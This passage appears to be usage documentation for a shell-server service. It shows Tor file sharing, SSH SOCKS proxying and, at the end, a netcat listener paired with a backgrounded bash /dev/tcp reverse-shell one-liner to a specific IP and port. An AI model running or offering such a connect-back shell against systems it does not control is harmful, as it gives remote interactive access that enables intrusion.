# Share files anonymously: echo "My First File Shared on The Onion Router (TOR) network" >/onion/helloworld.txt # Or publish a full webpage (using Markdown syntax): # Edit your webpage in /sec/www/content/*.md and then publish them: cd /sec/www && make html
ssh -D 127.0.0.1:1080 root@segfault.net # then from another Terminal on your workstation: curl -x socks5h://0 ipinfo.io curl -x socks5h://0 http://6nhmgdpnyoljh5uzr5kwlatx2u3diou4ldeommfxjz3wkhalzgjqxzqd.onion/
连接到您自己的公共端口:
1 2 3 4 5
# On your server: nc -vnlp 34868 # Find your IP & PORT during first log in. # On another server start a connect back reverse shell to your IP & PORT: setsid bash -i &>/dev/tcp/185.117.118.23/34868 0>&1 &